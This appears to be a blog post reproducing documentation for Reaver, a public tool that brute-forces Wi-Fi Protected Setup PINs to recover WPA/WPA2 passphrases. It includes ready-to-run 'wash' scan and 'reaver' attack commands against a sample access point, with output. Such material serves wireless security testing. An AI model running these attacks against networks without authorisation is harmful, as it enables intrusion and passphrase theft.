Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in Brute forcing Wi-Fi Protected
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase
Source: https://code.google.com/p/reaver-wps/
Kali Reaver Repo: http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
Author: Tactical Network Solutions, Craig Heffner,
License: GNU General Public License, version 2
Tools included in the reaver package
reaver – WiFi Protected Setup Attack Tool
wash – WiFi Protected Setup Scan Tool
wash Usage Example
Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
root@GitHackTools618:~# wash -i mon0 -c 6 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
reaver Usage Example
Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
root@GitHackTools:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
No comments:
Post a Comment